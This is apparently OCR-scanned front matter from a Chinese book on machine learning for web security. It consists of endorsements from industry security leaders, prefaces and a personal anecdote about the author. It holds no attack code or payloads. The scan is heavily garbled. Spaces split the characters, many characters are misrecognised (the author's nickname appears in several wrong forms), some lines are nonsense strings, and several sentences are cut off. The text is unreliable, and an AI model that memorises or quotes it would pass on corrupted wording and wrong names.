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此 亦 笃 信之 年 ， 此 亦 大 惑 之 年 。 此 亦 多 丽 之 阳春 ， 此 亦 绝 念 之 穷 冬 。 人 或 万 事 俱 备 ， 人 或 一 事 无 成 。 我 辈 其 青云 直上 ， 我 辈 其 黄泉 永 坠 。 一 一 《双城记 》 狄 更 斯 著 ， 魏 易 译 


如 今 是 一 个 人 工 智 能 兴起 的 年 代 ， 也 是 一 个 黑 产 独 铬 的 年 代 ; 是 一 个 机 器 学 习 算 法 百花 齐 放 的 年 代 ， 也 是 一 个 隐私 泄露 、 亚 意 代码 传播 、 网 络 攻击 肆虐 的 年 代 。AlphaGo 碾 压 柯 洁 之 后 ， 不 少 人 担心 AI 会 
抢 了 人 类 的 工作 ， 然 而 信息 安全 领域 专业 人 才 严 重 荐 乏 ， 极 其 需要 AI 来 补充 专业 缺口 。 


忽 哥 的 这 本 书展 示 了 丰富 多 彩 的 机 器 学 习 算 法 在 错综复杂 的 Web 安 全 中 的 应 用 ， 是 一 本 非常 及 时 的 人 工 智 能 在 信息 安全 领域 的 入 门 读物 。 正 如 书 中 所 述 ， 没 有 最 好 的 算法 ， 只 有 最 合适 的 算法 。 虽 然 这 
几 年 深度 学 习 呼 声 很 高 ， 但 各 种 机 器 学 习 算 法 依然 在 形形色色 的 应 用 场景 中 有 着 各 自 独特 的 价值 ， 熟 悉 并 用 好 这 些 算 法 在 安全 领域 的 实战 中 会 起 到 重要 的 作用 。 





= 


Lenx， 百 度 首 席 安 全 科学 家 ， 安 全 实验 室 责 人 


存储 和 计算 能 力 的 爆发 式 增长 ， 让 我 们 获得 了 比 以 往 更 全 面 、 实 时 地 获取 以 及 分 析 数 据 的 潜在 能 力 ， 但 面 对 产 生 的 海量 信息 如 何 快速 准确 地 转化 为 业务 需求 则 需要 依赖 一 些 非 传统 的 手段 。 就 安全 领域 
来 说 ， 原 先 依赖 于 规则 的 问题 解法 过 于 受 限 于 编写 规则 的 安全 专家 自身 知识 领域 的 广度 和 深度 ， 以 及 对 于 问题 本 质 的 理解 能 力 。 但 我 们 都 知道 ， 安 全 漏洞 层出不穷 ， 攻 击 利 用 的 方式 多 种 多 样 ， 仅 仅 依赖 于 
规则 进行 问题 的 发 现在 现 阶 段 的 威胁 形势 下 慢 慢 变 得 捉襟见肘 。 面 对 威胁 ， 企 业 安 全 人 员 需 要 打造 这 样 一 种 能 力 ， 它 能 够 让 我 们 脱离 单纯 的 点 对 点 的 竞争 ，case by case 的 对 抗 ， 转 而 从 更 高 的 维度 上 来 审视 
业务 ， 发 现 潜在 的 异常 事件 。 这 些 异 常事 件 可 能 会 作为 安全 人 员 深 入 调查 的 起 点 ， 让 我 们 具备 找到 原 有 安全 能 力 育 区 以 及 发 现 新 威胁 的 能 力 ， 使 我 们 的 技能 水 平 以 及 对 威胁 的 响应 速度 能 持续 提升 。 同 时 这 
种 能 力 和 防御 体系 结合 ， 也 有 可 能 让 我 们 达到 在 面 对 某 些 未 知 威 胁 时 ， 以 不 变 应 万 变 ， 获 得 天 然 免疫 的 理想 状态 。 兜 哥 的 这 本 书 或 许 是 开启 我 们 这 种 能 力 的 一 把 钥 是 。 本 书 通过 介绍 通俗 易 懂 的 机 器 学 习 原 
理 ， 结 合 实 际 企业 中 的 安全 业务 需求 场景 ， 让 广大 安全 人 员 能 够 感受 到 这 种 “如 日 中 天 ”的 技术 在 传统 安全 领域 内 如 何 大 放 异 彩 。 最 后 ，May the force be with you. 


一 一 王 宇 ， 妈 蚊 金 服 安全 总 监 


百度 是 拥有 海量 互联 网 数据 的 几 家 公司 之 一 ， 兜 可 是 百度 前 IT 安全 负责 人 ， 现 Web 安 全 产品 负责 人 ， 研 发 的 产品 不 仅 应 用 于 百度 公司 内 部 检测 网 络 攻击 ， 也 应 用 在 多 个 百度 的 商业 安全 产品 中 ， 服 务 于 


数 万 站 长 。 守 哥 的 团队 是 国内 最 时 一 批 将 机 器 学 习 算 法 应 用 于 网 络 安全 场景 的 团队 之 一 ， 本 书 聚 集 了 宽 哥 及 其 团队 多 年 的 安全 实践 经 验 ， 履 盖 了 互联 网 公司 可 能 会 遇 到 的 多 个 安全 场景 ， 比 如 用 图 算法 检测 
WebShell 等 ， 非 常 好 地 解决 了 百度 商业 安全 客户 被 入 侵 留 后 门 的 问题 。 金 哥 将 自己 的 技术 选 型 、 算 法 、 代 码 倾 过 相 授 ， 我 相信 本 书 的 出 版 将 会 大 大 降低 安全 研发 工程 师 转 型 安全 数据 分 析 专 家 的 难度 得 
推荐 。 


一 一 黄 正 ， 百 度 安全 实验 室 X-Team 负 责 人 ，MSRC 2016 中 国 区 第 一 


在 大 数据 时 代 ， 犯 罪 分 子 作 案 的 手段 越 来 越 高 明 ， 手 动 分 析 的 成 本 越 来 越 高 ， 效 率 也 越 来 越 低 ; 与 此 同时 ， 人 工 智能 技术 越 来 越 成 熟 ， 安 全 与 人 工 智能 技术 相 结合 ， 才 能 适应 新 的 环境 ， 推 荐 安全 从 业 
者 学 习 这 本 书 。 





桑 文 峰 ， 神 策 数据 创始 人 &CEO 


网 络 世 界 的 攻击 与 防护 对 抗 发 展 到 今天 ， 各 种 技术 已 经 日 趋 专业 和 精细 ， 通 过 十 老 的 sttingmatch 的 防御 方式 越 来 越 不 能 适应 新 的 攻击 环境 ， 对 于 想 尝 试 着 把 机 器 学 习 和 安全 相 结合 的 从 业 人 员 来 说 ， 阅 
读本 书 是 个 很 好 的 开端 。 
一 一 赵 林 林 ， 微 步 在 线 技 术 合 估 人， 前 美国、 高 德 安全 负责 人 
就 我 有 限 的 了 解 ， 在 很 长 一 段 时 间 里 ， 安 全 技术 和 机 器 学 习 技 术 都 是 分 别 演进 的 。 安 全 问题 几乎 会 伴随 着 任何 新 生 事物 而 来 ， 并 与 之 同 生 长 ， 这 也 使 得 安全 研究 人 员 往 往 会 把 注意 力 局 限于 关注 事物 的 
个 体 特征 而 忽略 其 群体 特征 ; 而 有 的 时 候 ， 即 使 有 意 于 群体 特征 的 研究 ， 也 可 能 会 圈 于 工具 和 方法 以 致 难于 寸 进 ， 这 对 安全 问题 的 解决 形成 了 事实 上 的 约束 。 机 器 学 习作 为 一 种 可 以 从 另 一 个 维度 来 解决 问 


题 的 技术 ， 则 对 此 约束 进行 了 相当 程度 的 突破 。 用 新 工具 去 解决 老 问 题 ， 这 要 求 对 这 两 者 都 有 比较 深入 的 了 解 (例如 AlphaGo) ， 基 于 了 解 而 进行 实践 ， 基 于 实践 而 予以 总 结 分 享 ， 这 样 的 知识 分 享 和 传递 ， 
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在 安全 分 析 中 要 想 用 好 机 器 学 习 ， 需 要 精通 算法 、 懂 得 攻防 、 理 解数 据 ， 三 方面 的 知识 缺 一 不 可 。 这 样 的 人 固然 难 找 ， 兜 哥 却 恰好 是 其 中 的 一 员 。 兜 哥 赁 借 在 一 线 互联 网 企业 多 年 的 安全 实战 经 验 给 读 
者 奉 上 了 这 本 满 满 都 是 干货 的 大 作 。 书 中 没有 烦琐 的 公式 推演 ， 一 切 用 代码 说 话 ， 特 别 适合 了 解 算 法 原理 、 不 知道 如 何在 实际 中 应 用 的 人 学 习 。 我 个 人 读 后 深 受 启 发 ， 也 推荐 给 身边 每 一 个 做 安全 数据 分 析 
的 同行 。 

周涛 ， 启 明星 展 “ 鸿 雁 ” 计 划 首 席 研 究 员 

在 大 数据 时 代 潮 流 中 ， 如 何 将 大 数据 思想 应 用 于 网 络 安全 技术 是 一 个 非常 重要 的 主题 。 本 书 将 Web 安 全 与 机 器 学 习 相 结合 ， 提 出 以 数据 驱动 为 基础 ， 利 用 海量 的 数据 资源 分 析 Web 恶 意 攻击 ， 以 通俗 易 懂 

的 语言 讲述 了 机 器 学 习 在 Web 安 全 领域 多 个 方面 的 应 用 。 对 Web 安 全 以 及 大 数据 安全 感 兴趣 的 人 ， 这 本 书 是 一 个 很 好 的 选择 。 


伴随 着 互联 网 的 爆炸 式 发 展 ， 网 络 安全 已 上 升 到 国家 层面 ， 按 效果 说 话 的 安全 能 力 建设 得 到 高 度 重 视 。 与 此 同时 ， 安 全 团队 却 又 不 得 不 面 对 百 花 齐 放 的 业务 场景 、 大 规模 的 数据 中 心 ， 以 及 愈加 剧烈 、 
复杂 和 不 确定 性 的 网 络 攻击 。 如 何在 传统 攻防 对 抗 之 外 ， 寻 找 更 有 效 、 可 落地 的 对 抗 方式 ， 已 成 为 各 大 企业 安全 团队 思考 的 重点 。 所 幸 ， 近 些 年 来 ， 计 算 和 存储 资源 已 不 是 安全 团队 的 瓶颈 ， 安 全 团队 自身 
在 工程 能 力 上 也 已 非 背 日 吴 下 阿 蒙 。 机 器 学 习 成 为 近 些 年 来 安全 领域 里 第 一 批 从 学 术 走 向 工业 的 应 用 方向 ， 并 已 有 很 多 阶段 性 的 实践 成 果 。 很 欣喜 地 看 到 久 哥 一 直 在 推进 机 器 学 习 系 列 的 文章 并 编写 了 此 
书 。 此 书 重 点 讲解 了 常见 机 器 学 习 算 法 在 不 同 场景 下 的 潜在 应 用 和 实践 ， 非 常 适合 初学 者 入 门 。 希 望 此 书 能 够 启发 更 多 的 同行 继续 实践 和 深耕 机 器 学 习 应 用 这 个 方向 ， 并 给 安全 行业 带 来 更 多 的 反馈 和 讨 


论 。 


一 一 程 岩 ， 京 东安 全 首席 架构 师 


人 工 智 能 的 技术 发 展 正 在 不 断 加 速 ， 是 时 候 探 讨 如 何 将 机 器 学 习 应 用 于 安全 领域 了 。 人 工 智 能 真 的 能 在 未 来 对 抗 网 络 攻 击 、 自 主 保护 我 们 的 系统 吗 ? 这 本 书 打 开 了 一 道门 。 这 不 仅 是 一 部 机 器 学 习 的 科 
普 书 ， 一 部 机 器 学 习 在 安全 场景 下 的 实战 书 ， 更 是 一 部 鼓励 技术 创新 应 用 的 行动 指南 。 





谢 忱 ，FreeBuf 联 合 创 始 人 ， 斗 象 科技 COO 


全 正在 发 生变 革 ， 已 经 从 专家 模式 逐渐 演变 成 系统 化 、 平 台 化 ， 而 随 着 机 器 学 习 和 大 数据 技术 的 发 展 ， 未 来 安全 将 逐渐 智能 化 。 而 这 种 变化 已 经 得 到 了 验证 ， 在 业务 安全 领域 风 控 系统 的 基础 数据 
中 ， 如 IP 和 用 户 画 像 、 设 备 指纹 生成 和 识别 、 规 则 的 挖掘 都 使 用 大 量 的 机 器 学 习 算 法 ; 在 网 络 安全 领域 ， 如 何 入 侵 检 测 系 统 发 现 未 知 的 攻击 、 如 何 解决 无 效 的 攻击 行为 也 采用 了 大 量 的 分 类 和 关联 规则 算 
法 。 兜 哥 作 为 互联 网 企业 的 安全 界 资 深 研究 者 ， 一 直 对 新 技术 的 运用 进行 探索 ， 这 本 书 将 为 你 打开 安全 智能 化 的 大 门 。 


一 一 美 圣 ，58 同 城 高 级 架构 师 


机 器 学 习 一 直 是 高 大 上 的 领域 ， 作 者 结合 自己 的 实际 工作 和 研究 ， 把 机 器 学 习 在 安全 领域 的 应 用 讲 得 深入 浅 出 、 很 接地 气 ， 稍 具 基 础 知识 的 读者 就 可 动手 体验 应 用 机 器 学 习 的 美妙 感受 。 


纵 观 安全 行业 近 十 余年 的 攻击 方式 ， 从 最 早 的 单机 小 工具 到 如 今 分 布 式 、 大 数据 、 自 动 化 等 攻击 方式 ， 防 御 的 方式 不 得 不 随 之 不 断 升级 ， 于 是 出 现 各 种 云 安全 产品 ， 这 些 产品 都 能 产生 大 量 有 价值 的 数 
H, 但 却 少 有 产品 能 够 真正 利用 这 些 数 据 实现 联动 防御 ， 所 以 这 些 云 都 是 单条 的 小 云 。 我 们 需要 利用 人 工 智 能 将 这 些 数据 进行 联动 ， 进 行 多 维度 、 高 精度 的 深入 分 析 ， 还 原 攻 击 路 径 ， 才 能 真正 实现 态势 感 
知 ， 防 御 未 知 攻 击 。 而 人 工 智能 的 基础 就 是 机 器 学 习 ， 让 机 器 自 适 应 、 自 分 析 、 自 决策 ， 未 来 的 安全 防御 必须 具备 这 样 的 特性 。 本 书 采用 实例 的 方式 讲解 机 器 学 习 在 安全 领域 的 应 用 ， 不 仅 能 让 读者 了 解 到 
机 器 学 习 ， 还 能 让 读者 了 解 到 攻击 方式 的 检测 手段 ， 是 一 本 难得 的 好 书 。 


——F #, Sobugth ROA, (RAG RH: 企业 级 Web 代 码 安 全 架构 》 作 者 


在 机 器 学 习 领 域 中 ， 大 多 数 的 实用 方向 都 表现 在 图 像 识别 、 广 告 推荐 和 个 性 画像 等 方面 ， 但 很 少 看 见 安全 领域 相关 的 机 器 学 习 方 法 和 介绍 ， 因 为 “安全 ”的 概念 是 很 模糊 的 ， 有 的 场景 中 ， 很 少 有 合适 
的 模型 、 适 用 的 参数 ， 基 至 没有 明确 的 算法 。 这 本 书 介绍 了 基础 的 机 器 学 习 应 用 和 方法 ， 并 结合 部 分 特殊 的 场景 对 安全 领域 中 较为 常见 和 较为 烦琐 的 分 析 提供 了 很 好 的 例子 和 思维 模型 ， 不 论 是 安全 从 业 人 
员 或 者 是 机 器 学 习 领域 的 研究 者 ， 都 值得 阅读 ， 可 以 从 本 书 中 获得 很 多 好 的 启发 和 灵感 。 





Kevin1986， 搜 狐 资 深 安全 研究 员 


不 知道 十 余年 前 ， 在 狗 哥 刚刚 踏 上 安全 这 条 “不 归 路 ”时 ， 有 没有 想 过 如 今 的 工作 会 面 对 多 么 错综复杂 的 环境 ， 担 负 着 数 亿 用 户 的 信赖 。 在 大 型 互联 网 公司 中 ， 产 品 线 绵延 复杂 ， 每 一 个 新 产品 的 上 
线 ， 每 一 次 版 本 的 迭代 更 新 ， 都 有 不 可 预知 的 安全 问题 出 现 ， 安 全 防御 体系 也 无 时 无 刻 不 在 应 对 新 的 挑战 。 哪 怕 是 拥有 丰富 工作 经 验 的 安全 从 业者 ， 在 面 对 层 出 不 穷 的 攻击 手段 和 海量 的 日 志 数 据 时 也 会 望 
洋 兴 叹 。 机 器 学 习 是 这 些 问题 天 然 契 合 的 解决 方案 ， 在 数据 量 以 指数 级 不 断 增 长 的 未 来 ， 黄 至 有 可 能 是 唯一 的 出 路 。 机 器 学 习 如 今 可 以 说 是 如 日 中 天 的 热 词 ， 但 对 于 初学 者 来 说 可 能 并 不 是 很 容易 就 能 掌握 
的 技能 。 将 学 习 到 的 内 容 应 用 在 安全 工作 中 更 是 难 上 加 难 。 这 或 许 也 是 机 器 学 习 经 常 出 现在 安全 从 业者 视野 中 ， 却 鲜 有 人 愿意 深入 研究 的 原因 之 一 吧 。 兜 哥 作 为 互联 网 安全 领域 内 机 器 学 习 的 先导 或 行者 ， 
可 以 说 是 从 零 开 始 ， 在 不 断 尝 试 中 摸索 出 了 一 条 新 的 道路 。 毫 无 疑问 ， 这 是 一 个 艰难 而 有 价值 的 过 程 。 这 本 书 作 为 走 过 这 段 历程 之 后 的 总 结 与 分 享 ， 兜 哥 将 多 年 的 工作 经 验 毫 无 保留 地 倾注 于 其 中 ， 以 一 个 
甲 方 安全 人 员 的 视角 ， 将 机 器 学 习 如 何 应 用 在 Web 安 全 工作 的 各 个 方面 ， 用 该 谐 易 懂 的 语言 娓 娓 道 来 。 在 一 气 呵 成 地 读 罢 儿 可 亲手 递 过 的 样 章 之 后 ， 我 只 有 一 个 想法 : 如 今 的 Web 安 全 领域 ， 太 需要 这 样 一 本 
佳作 了 。 或 许 未 来 的 某 一 天 ， 机 器 学 习 或 者 说 人 工 智能 已 经 成 为 了 保护 互联 网 安全 的 中 坚 力 量 。 回 头 一 看 ， 正 是 本 书 在 路 途 的 起 点 为 我 们 指明 了 方向 。 


一 一 幻 泉 ，i 春 秋 教 研 中 心 总 监 


识别 各 类 攻击 一 直 是 安全 领域 内 难以 解决 的 问题 ， 由 于 语言 的 多 样 性 ， 利 用 传统 规则 匹配 来 识别 攻击 已 经 过 时 ， 传 统 安 全 技术 的 发 展 也 已 经 到 了 瓶颈 ， 而 本 书 提出 机 器 学 习 结合 Web 安 全 的 思路 为 安全 
技术 发 展 指出 了 新 的 方向 。 相 信 读 者 阅读 本 书后 能 受益 匪 浅 。 


一 一 西瓜 ， 四 叶 草 CITO 


审计 日 志 已 经 无 法 解决 企业 实际 安全 需求 。 随 着 硬件 成 本 降低 ， 大 数据 技术 成 熟 ， 机 器 学 习 在 企业 安全 中 的 实践 应 运 而 生 。 本 书 详细 介绍 了 如 何 通过 机 器 
的 攻击 ， 本 书 是 企业 安全 建设 中 不 可 多 得 的 孙子 兵法 


早 在 2009 在 百度 工作 时 ， 就 因为 工作 交集 认识 了 本 书 作者 刘涛。 期 间 经 常 讨论 安全 技术 问题 ， 为 他 的 渊博 知识 与 钻研 精神 所 折服 。 近 年 来 ，Web 安 全 被 越 来 越 多 的 人 所 重视 ， 攻 防 对 抗 上 升 到 一 个 新 的 
高 度 。 各 种 新 的 攻击 方法 层出不穷 ， 传 统 的 检测 与 防御 方式 已 不 再 适应 ， 迫 切 需 要 更 加 智能 的 方法 。 随 着 机 器 学 习 的 爆发 式 发 展 ， 两 者 的 结合 将 是 未 来 的 趋势 。 在 本 书 中 ， 刘 内 将 枯燥 复杂 的 算法 、 概 念 以 
简单 易 懂 的 图 文 结合 方式 呈现 出 来 ， 并 夹杂 着 他 一 呐 的 幽默 风格 ， 内 容 由 浅 入 深 、 循 序 渐 进 。 应 用 机 器 学 习 是 未 来 的 发 展 趋势 ， 学 习 掌 握 它 使 创造 出 新 一 代 的 安全 产品 成 为 可 能 。 和 希望 大 家 喜欢 这 本 书 ， 并 


一 一 刘表 君 ， 医 渡 云 安全 总 监 


通过 机 器 学 习 分 析 海量 Web 日 志 ， 进 而 发 现 业 务 异 常 和 安全 问题 已 经 是 安全 监控 平台 的 标 配 。 然 而 ,市场 上 信息 安全 和 机 器 学 习 结 合 的 工具 书 却 很 少 ， 本 书 从 基础 知识 和 实际 案例 出 发 ， 逐 步 抽 丝 剥 蓝 
带 你 进入 自动 化 安全 的 殿堂 。 书 中 的 算法 和 思路 是 经 过 大 规模 部 署 和 商业 验证 的 ， 具 备 很 强 的 可 操作 性 。 
一 一 宋 文 宽 ， 联 想 集 团 信息 安全 高 级 经 理 
F— 
锅 哥 是 网 络 安全 行业 的 老兵 ， 早 在 成 为 自 媒 体 人 之 前 ， 他 所 带领 的 困 队 在 Web 入 侵 检 测 、WebShell 识 别 等 技术 上 就 是 百度 安全 防御 的 重要 组 成 部 分 一 位 十 分 难得 的 拥有 敏感 产品 神经 的 技术 人 ,在 


百度 这 些 年 ， 不 仅 将 许多 新 产品 、 新 技术 引入 百度 ， 丰 富 百 度 防御 能 力 ， 更 通过 自己 的 努力 将 百度 在 威胁 检测 等 方面 的 经 验 不 断 传 播 出 去 。 他 通过 自己 的 智能 安全 三 部 曲 将 他 在 人 工 智能 方向 的 探索 向 业界 
做 了 系统 性 分 享 ， 在 安全 技术 亟待 突破 的 今天 ， 有 着 很 深 的 借鉴 意义 。 本 书 是 他 的 第 一 部 著作 ， 重 点 介绍 如 何在 安全 场景 下 进行 机 器 学 习 。 


回顾 网 络 安全 行业 这 十 年 来 的 发 展 ， 从 防火 墙 、 下 一 代 防 火 墙 、 入 侵 检 测 到 威胁 情报 ， 安 全 厂商 一 次 次 将 新 的 概念 引入 ， 将 新 的 技术 包装 ， 但 安全 威胁 的 现状 却 一 天 天 恶化 着 ， 当 我 们 看 到 越 来 越 多 的 





全 入 侵 事 件 发 生 ， 其 波及 范围 也 已 经 不 仅仅 是 互联 网 业务 ,更 有 大 量 的 国民 基础 设施 深 陷 泥 潭 ， 我 们 不 禁 要 问 ， 是 黑客 越 来 越 强大 ， 还 是 我 们 的 技术 不 够 先进 ? 我们 被 眼花 绑 乱 的 技术 所 困 ， 却 忽略 了 安 
今天 炙手可热 的 人 工 智 能 是 否 也 会 是 一 枚 “ 银 弹 ”? 
诚然 ， 人 工 智 能 在 自然 语言 处 理 、 图 像 识别 、 棋 类 对 抗 领域 的 成 绩 有 目 共 睹 ， 全 能 否 成 为 下 一 个 人 工 智 能 的 突破 口 ? 现在 看 来 ， 一 切 正 方兴未艾 ， 在 有 监督 学 习 方 向 ， 大 幅 简 化 安全 工程 师 的 
工作 量 ， 让 准 实 时 对 抗 成 为 可 能 ; 在 无 监督 学 习 方 向 ， 能 和 否 突破 安全 对 抗 的 猫 鼠 游戏 ， 让 安全 由 被 动 变 为 主动 。 等 待 我 们 的 将 是 一 场 令 人 激动 的 技术 探索 。 


序 二 


多 哥 在 通过 数据 分 析 进 行 安 全 检测 的 技术 方面 已 经 积累 了 很 长 时 间 ， 从 最 初 我 们 合作 建立 国内 最 大 TB 级 别 日 志 分 析 系 统 开始 ， 在 这 几 年 中 ， 他 一 直 在 不 断 党 试 使 用 更 合适 的 技术 来 解决 问题 ， 这 次 欣喜 


地 看 到 了 他 又 有 新 的 突破 。 


拿 到 样 章 当 看 到 “ 通 向 智能 安全 的 旅程 ”这 一 章 时 ， 着 实 被 深 深 地 吸引 住 了 ， 在 新 技术 中 尝试 使 用 机 器 学 习 的 能 力 ， 人 和 借助 AL， 能 让 系统 变 得 更 加 聪明 更 好 用 ， 从 而 更 好 地 解决 问题 。Gattnet 在 2015 年 就 
提出 过 “ 自 适应 安全 架构 来 应 对 高 级 定向 攻击 ”的 概念 ， 其 中 实现 这 和 套 架 构 很 重要 的 一 个 阶段 就 是 让 系统 具备 对 攻击 的 预测 能 力 ，“ 预 测 ” 是 一 种 更 接近 人 的 思考 方法 ， 通 过 机 器 学 习 及 人 工 智能 的 技术 选 


安全 数据 分 析 已 经 从 搭建 大 数据 分 析 系 统 过 渡 到 使 用 机 器 学 习 的 过 程 中 了 ， 通 过 机 器 学 习 和 工法 对 安全 事件 的 分 析 在 一 段 时 间 内 也 许 并 不 能 突出 优势 ， 就 像 我 们 面 对 一 个 天 才 少 年 一 样 ， 因 为 阅历 原因 暂 
时 他 不 能 超越 你 ， 但 他 一 定 会 用 非常 短 的 时 间 就 能 追 上 并 且 更 好 地 帮助 你 。 


阅读 过 程 中 常常 感叹 于 兜 哥 的 细心 和 他 对 此 系列 书 的 撰写 决心 ， 兜 哥 是 一 位 不 折 不 扣 的 技术 实践 者 ， 全 书 使 用 了 超过 15 种 机 器 学 习 的 算法 ， 收 集 整 理 了 大 量 或 知名 、 或 在 真实 环境 下 出 现 过 的 案例 ， 并 
一 一 详细 给 出 了 使 用 机 器 学 习 算 法 进行 分 析 的 方法 。 书 中 还 包含 了 丰富 的 数据 集 以 及 大 量 的 实例 ， 能 帮助 入 门 的 同学 降低 学 习 成 本 ， 快 速 进入 技术 实践 中 。 阅 读 的 过 程 中 ， 我 常常 在 假想 ， 如 果 回 到 几 年 前 
看 到 这 本 书 ， 现 在 我 们 搭建 的 分 析 系统 又 将 是 另 一 番 景 象 。 


本 书 的 写作 风格 是 实战 型 的 ， 围 绕 常 见 的 安全 问题 ， 通 过 代码 导读 的 方式 ， 把 每 个 问题 与 机 器 学 习 算 法 相关 联 ， 循 序 渐 进 ， 揭 开 了 机 器 学 习 的 神秘 面纱 。 对 于 立志 从 事 信息 安全 技术 的 同学 来 说 ， 这 种 
实战 型 的 案例 更 直观 ， 更 能 激发 学 习 兴 趣 ， 推 动机 器 学 习 在 安全 分 析 上 的 应 用 。 


云 朋 ， 百 度 无 人 车 首席 安全 架构 师 


BRI 


跟 忽 哥 相识 迄今 一 年 有 余 ， 当 时 我 还 在 一 个 跨 境 电 商 公司 当 码 农 头 子 ， 互 金 、 电 商 也 都 还 是 资本 圈 炙 手 可 热 的 概念 ， 我 们 这 个 小 而 美的 电 商 公司 不 能 免 俗 ， 三 天 一 小 促 ， 五 天 一 大 促 地 在 玩 着 冲刺 
GMV (日 总 交易 金额 ) 的 游戏 。 玩 命 狂奔 业绩 的 同时 ， 我 早早 地 就 跟 当 时 还 身 为 独立 安全 公司 的 “安全 宝 ” 交 了 抗 DDoS 费 ， 保 证 每 次 业务 起 起 落落 的 时 候 ， 不 会 受到 某 一 小 报 别 有 用 心 的 敌对 势力 的 干 
扰 。“ 安 全 宝 ” 的 服务 接 入 不 到 半年 就 爆 出 新 闻 ， 百 度 全 资 收购 了 “安全 宝 ”， 推 出 了 面向 企业 的 百度 安全 服务 体系 。 一 直 跟 我 对 接 的 “安全 宝 ” 的 销售 朋友 摇身一变 ， 成 为 三 巨头 之 一 的 金领 员工 。 朋 友 
高 升 遇 喜 自然 要 多 多 分 享 ， 于 是 某 日 就 电话 约 了 “百度 资深 安全 工程 师 和 销售 团队 ”来 我 们 这 里 做 一 个 交流 。 产 品 介绍 、 业 界 和 八卦 聊 了 半 个 多 小 时 以 后 ， 一 直 安 坐 对 方 一 角 ， 眼 睛 闪 着 灵光 的 胖子 始终 没 说 
话 。 我 接受 不 了 屋 里 仅 有 两 个 胖子 ， 一 个 是 我 一 直 在 聊 ; 另 一 个 胖子 却 如 此 沉默 。 于 是 我 就 开口 问 : “你 们 客户 端的 那个 核心 xx 功 能， 就 是 这 个 角落 里 不 说 话 的 大 黑客 写 的 吧 ? ” 


“没有 ， 没 有， 我 们 的 xx 功能 不 是 那样 的 。 ”这 哥们 终于 开口 说 了 第 一 句 话 。 


“RTA, A Axx, xx. xxo ” RVC HCH T is. 


“ 额 ， 来 ， 先 留 个 微 信 吧 。” 我 站 起 来 ， 把 手机 递 了 过 去 。10 秒 钟 后 ，“ 中 国 相 声 界 的 小 学 生 通过 扫 一 扫 添 加 你 为 好 友 ” 的 消息 弹 了 出 来 。“ 你 太吉 了 。” 我 忍 不 住 看 着 对 方 评论 了 一 句 ， 心 想 : RA 
有 趣 的 码 农 朋友 交 定 了 。 散 会 后 ， 几 个 人 站 在 办 公 室 楼 下 ， 相 声 界 的 小 学 生 朋 友 特 别 真 诚 地 感谢 了 一 下 我 提供 如 此 好 的 机 会 ， 让 他 们 有 机 会 从 中 国 互 联网 的 物理 核心 交换 地 区 后 厂 村 来 到 事业 线 、 大 白 腿 比 
例 明 显 高 一 个 数量 级 的 CBD 地 区 。 我 则 不 失 时 机 地 指点 了 对 方 一 下 ， 应 该 步行 走 一 段 什么 样 的 路 线 去 地 铁 站 ， 能 更 顺利 地 回 到 核心 交换 地 区 。 这 就 是 我 跟 忽 哥 的 第 一 次 见面 。 


接 下 来 的 一 段 时 间 ， 相 声 界 的 小 学 生 朋 友 变 成 了 我 微 信 朋 友 圈 中 昵称 更 换 频 率 最 高 的 人 ， 在 目睹 了 “青青 河 边 草 ”“ 小 小 铜 纺 豆 ” 等 花 式 变更 之 后 ， 我 知道 蹦 小 学 生 朋 友 一 顿 大 餐 的 机 会 成 熟 了 ， 于 是 
很 愉快 地 约 了 一 顿 丰盛 的 晚饭 。 一 向 不 胜 酒 力 又 闵 骚 的 码 农 们 碰 到 三 观 相近 的 同类 ， 总 是 特别 容易 敞开 心 库 ， 能 筹 交 错 间 ， 关 于 奋斗 、 关 于 公司 、 关 于 互联 网 ， 当 然 ， 还 有 关于 男男女女 ， 让 一 次 普通 而 平 
淡 的 饭局 变 得 特别 有 记忆 特质 。 尽 管 我 的 记忆 力 很 难 达 到 生活 自理 的 标准 ， 不 过 时 至 今日 


后 来 我 们 目 腾 了 百度 公司 改 然 启 航 进 入 人 工 智能 的 时 代 。 其 实 对 于 搜索 巨人 百度 公司 ， 人 工 智 能 领域 内 常见 的 如 最 大 灶 、 隐 马尔 科 夫 、 卷 积 神 经 网 络 等 数学 模型 ， 从 第 一 天 起 就 如 血液 一 般 ， 渗 透 进入 
分 词 、 排 序 、 分 类 、 聚 类 等 搜索 业务 的 大 部 分 领域 ， 经 过 了 十 来 年 的 高 歌 猛 进 ， 这 些 上 涩 难 懂 的 数学 公式 日 益 扩大 了 其 应 用 范围 ， 在 安全 领域 也 得 到 了 越发 深入 的 应 用 。 


了 聪明、 努力、 专注 是 忽 哥 写作 一 本 书 的 智力 储备 和 保证 。 这 个 被 摩尔 定律 不 停 推 动 、 变 革 的 时 代 ， 一 本 技术 书籍 本 身 的 价值 和 生命 周期 总 是 有 限 的 。 然 而 ， 随 着 年 纪 渐 长 ， 我 们 越 来 越 体 会 到 ， 自 己 的 
时 间 消费 中 最 有 价值 的 部 分 ， 永 远 是 与 有 趣 的 灵 瑰 和 思想 共处 的 片段 。 人 类 天 性 讨厌 无 超 ， 毕 生 的 使 命 都 是 在 寻找 与 有 趣 共 振 的 机 会 。 一 本 精心 写作 的 书籍 中 ， 饱 合 了 作者 倾注 的 时 光 和 智慧 ， 这 些 无 形 的 
精神 宝藏 是 让 我 们 手 不 释 卷 的 核心 吸引 力 。 品 一 杯 茶 ， 我 们 的 欢喜 来 自 于 能 品 到 茶叶 所 经 历 的 春 夏 秋冬 和 风 需 雨 雪 ; 读 一 本 书 ， 我 们 的 满足 来 自 于 通过 书本 连接 到 有 趣 的 灵魂 。 有 趣 的 人 总 会 相遇 ， 和 希望 在 
读 完 本 书后 ， 你 也 能 感受 到 书 中 纷繁 村 燥 的 数学 逻辑 背后 与 你 共振 的 有 趣 灵 魂 。 


一 一 罗 姻 ， 中 国 互联 网 资深 码 农 ， 曾 任 去 哪 网 高 级 总 监 ， 菜 著名 跨 境 电 商 CTO 


近 几 年 ， 人 工 智 能 无 疑 成 为 人 们 口中 的 热点 话题 ， 先 是 谷歌 的 AlphaGo， 后 有 百度 的 度 秘 、 无 人 车 ， 微 软 必 应 搜索 推出 的 小 冰 。 这 一 系列 人 工 智 能 产品 的 推陈出新 ， 令 人 眼花 线 乱 ， 一 时 间 给 人 的 感觉 是 
人 工 智 能 遍地 开花 。 无 论 人 们 接受 还 是 不 接受 ， 人 工 智 能 都 在 迅速 渗透 各 行 各 业 。 网 络 安全 相 比 之 下 是 一 个 传统 行业 ， 基 于 规则 以 及 黑白 名 单 的 检测 技术 已 经 发 展 到 了 一 定 的 瓶颈 ， 而 利益 驱动 的 黑 产 团 
